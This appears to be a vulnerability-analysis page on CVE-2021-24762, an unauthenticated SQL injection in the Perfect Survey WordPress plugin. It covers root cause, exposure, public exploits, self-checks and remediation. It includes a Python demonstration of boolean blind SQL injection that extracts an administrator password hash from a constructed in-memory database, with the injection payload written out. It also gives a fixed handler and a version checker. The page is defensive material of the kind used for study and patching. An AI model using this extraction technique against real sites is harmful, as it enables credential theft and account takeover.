This is a summary of the AI-generated 10-question deep analysis. The full version (longer answers, follow-up Q&A, related CVEs) requires login.
Q1 What is this vulnerability? (Essence + Consequences)
**Essence**: An unauthenticated SQL injection (SQLi) flaw in the **Perfect Survey** WordPress plugin (CVE-2021-24762). **Consequences**: an attacker can append arbitrary SQL to a query the plugin runs against the WordPress database, read data they should never see (including user password hashes), and work from there toward taking over the admin account. …
**Root Cause**: **CWE-89** (SQL Injection). The plugin does not validate or escape the `question_id` GET parameter before using it in a SQL statement inside the `get_question` AJAX action, which is served through `wp-admin/admin-ajax.php` and is registered for unauthenticated (nopriv) requests. A numeric cast plus a prepared statement is the standard fix for this flaw class. …
**Affected**: **Perfect Survey WordPress plugin**, versions **before 1.5.2** (1.5.2 is the fixed release). If you are running an older version, you are exposed. WordPress core is not at fault; the plugin is the weak link.
Q4 What can hackers do? (Privileges/Data)
**Attacker Capabilities**: Any unauthenticated visitor can inject SQL through `question_id`. The query result is not reflected in the response, so public exploits use **blind SQLi**, inferring one yes/no answer per request, to pull the administrator's password hash out of `wp_users` character by character. That hash still has to be cracked offline before it yields a login, but it is the direct route to account takeover, and anything else stored in the database (other users' hashes, options, survey responses) can be read the same way.
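The following is an added example, not the plugin's code and not any published PoC: a small Python/SQLite model of the flaw class behind the root cause above (a `question_id` spliced into a query) and of the blind extraction described under Q4. The table layout, the admin hash and the table name `questions` are constructed for the example; the real plugin's schema and the real exploit payloads are not reproduced here.

```python
import sqlite3

# Constructed stand-in for a WordPress database: the table the get_question
# action reads, plus wp_users holding an admin row with a phpass-style hash.
# Hypothetical data for this example, not taken from any real site.
CONSTRUCTED_ADMIN_HASH = "$P$BExampleHashNotReal0123456789ab"


def make_db() -> sqlite3.Connection:
    """Build an in-memory SQLite database with the two tables the example needs."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE questions (id INTEGER PRIMARY KEY, text TEXT);
        INSERT INTO questions VALUES (1, 'How satisfied are you with our service?');
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        """
    )
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (CONSTRUCTED_ADMIN_HASH,))
    return conn


def get_question_vulnerable(conn: sqlite3.Connection, question_id: str) -> list:
    """CWE-89 pattern: the request parameter is spliced into the SQL text unvalidated.
    This models the flaw class the advisory describes, not the plugin's actual code."""
    sql = "SELECT id, text FROM questions WHERE id = " + question_id
    return conn.execute(sql).fetchall()


def get_question_fixed(conn: sqlite3.Connection, question_id: str) -> list:
    """Hardened form: reject anything that is not an integer, then bind the value.
    The WordPress equivalent is $wpdb->prepare('... WHERE id = %d', $id)."""
    try:
        qid = int(question_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, text FROM questions WHERE id = ?", (qid,)).fetchall()


def blind_extract_hash(conn: sqlite3.Connection, length: int) -> tuple:
    """Boolean-based blind extraction of the admin hash through the vulnerable handler.

    The only signal is whether the question row comes back, so each request asks a
    yes/no question about one character; a binary search over printable ASCII
    (32..126) recovers each character in at most 7 requests.
    Returns (recovered_hash, request_count).
    """
    recovered = []
    requests = 0
    for pos in range(1, length + 1):
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi + 1) // 2
            # Row 1 is returned only when the character at `pos` is >= mid.
            payload = (
                "1 AND unicode(substr((SELECT user_pass FROM wp_users "
                f"WHERE user_login = 'admin'), {pos}, 1)) >= {mid}"
            )
            requests += 1
            if get_question_vulnerable(conn, payload):
                lo = mid
            else:
                hi = mid - 1
        recovered.append(chr(lo))
    return "".join(recovered), requests


if __name__ == "__main__":
    db = make_db()
    leaked, n = blind_extract_hash(db, len(CONSTRUCTED_ADMIN_HASH))
    print(f"leaked {leaked!r} in {n} requests")
    print("fixed handler, same kind of payload:", get_question_fixed(db, "1 AND 1=1"))
```

The request count is the practical takeaway for defenders: a 34-character hash leaks in a couple of hundred requests, each of which looks like an ordinary `admin-ajax.php` hit apart from the `question_id` value, so a log search for non-numeric `question_id` values is the cheapest detection. The hardened handler returns nothing for the injected input instead of evaluating it.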
Q5 Is exploitation threshold high? (Auth/Config)
**Exploitation Threshold**: **LOW**. No authentication and no special configuration are required: a single GET request to the `get_question` AJAX action with a crafted `question_id` is enough, so any internet-facing site with a vulnerable version of the plugin active is exposed.
Q6 Is there a public Exp? (PoC/Wild Exploitation)
**Public Exploits**: **YES**. Multiple PoCs exist, including a dedicated blind SQLi exploit repository (`c4cnm/Exploit_CVE-2021-24762`) that extracts the admin password hash. A Nuclei template for the CVE is also available, so the flaw is trivially scannable at scale.
Q7 How to self-check? (Features/Scanning)
**Self-Check**: Find the installed **Perfect Survey** version (the Plugins page in wp-admin, or `wp plugin list` with WP-CLI) and treat anything below 1.5.2 as vulnerable. From the outside, run **Nuclei** with the CVE-2021-24762 template, or check whether the `get_question` AJAX action answers unauthenticated requests and whether a non-numeric `question_id` changes its response; prefer a scanner over hand-built payloads against production.
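An added example of the version check above, written for this page rather than taken from the plugin or any scanner: it parses the `Stable tag` line of a plugin `readme.txt` and compares it with the fixed release. The plugin directory name `perfect-survey` and the sample readme text are assumptions; confirm the slug against the directory under `wp-content/plugins/` before trusting the live check.

```python
import re
import urllib.request
from urllib.parse import urljoin

FIXED_VERSION = "1.5.2"  # first release without the flaw, per the advisory
# Assumed plugin slug; verify it matches the directory name under wp-content/plugins/.
ASSUMED_PLUGIN_SLUG = "perfect-survey"

# Constructed readme.txt excerpt in the format WordPress.org plugins use.
SAMPLE_README = """=== Perfect Survey ===
Contributors: example
Tags: survey, poll
Requires at least: 4.0
Tested up to: 5.8
Stable tag: 1.5.1
"""


def parse_version(version: str) -> tuple:
    """'1.5' -> (1, 5, 0): split on dots, keep leading digits, pad to three parts."""
    parts = []
    for piece in version.strip().split("."):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_vulnerable(version: str) -> bool:
    """True when the installed version predates the fixed release."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def version_from_readme(text: str):
    """Pull a numeric 'Stable tag: X.Y.Z' from a plugin readme.txt; None if absent
    or non-numeric (e.g. 'trunk'), so an unknown version is never reported as safe
    or vulnerable by accident."""
    m = re.search(r"^Stable tag:\s*(\d[\w.\-]*)", text, re.MULTILINE | re.IGNORECASE)
    return m.group(1) if m else None


def check_site(base_url: str, timeout: float = 10.0):
    """Fetch the plugin readme from a live site (network; not exercised offline).
    Returns (version, vulnerable); (None, None) when the readme is not exposed."""
    url = urljoin(base_url.rstrip("/") + "/",
                  f"wp-content/plugins/{ASSUMED_PLUGIN_SLUG}/readme.txt")
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except Exception:
        return None, None
    version = version_from_readme(body)
    return version, (is_vulnerable(version) if version else None)


if __name__ == "__main__":
    v = version_from_readme(SAMPLE_README)
    print(f"readme reports {v}: {'VULNERABLE' if is_vulnerable(v) else 'patched'}")
```

A readme fetch is only a fingerprint: some sites block direct access to plugin files or ship a stale readme, so a `None` result means "unknown", not "safe", and the authoritative answer is the version shown in wp-admin. For an active check, `nuclei -u https://example.com -id CVE-2021-24762` (assuming the template id matches the CVE id, as in the nuclei-templates repository) sends the template's own probe.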
**No Patch?**: If you cannot update to 1.5.2 or later, **deactivate the plugin** immediately; a deactivated plugin registers no hooks, so the `get_question` AJAX action disappears with it. A WAF rule that rejects non-numeric `question_id` values on the `get_question` action is an acceptable stopgap, but signature matching is bypassable, so treat it as a bridge to the update, not a replacement for it.
Q10 Is it urgent? (Priority Suggestion)
**Urgency**: **HIGH**. Unauthenticated, reachable from the internet, public PoC plus a scanner template, and the payoff is the administrator's password hash: update to 1.5.2 or later now. If a vulnerable version has been exposed, search the web server access logs for `admin-ajax.php` requests with `action=get_question` and non-numeric `question_id` values, and rotate administrator passwords if any turn up. Don't wait!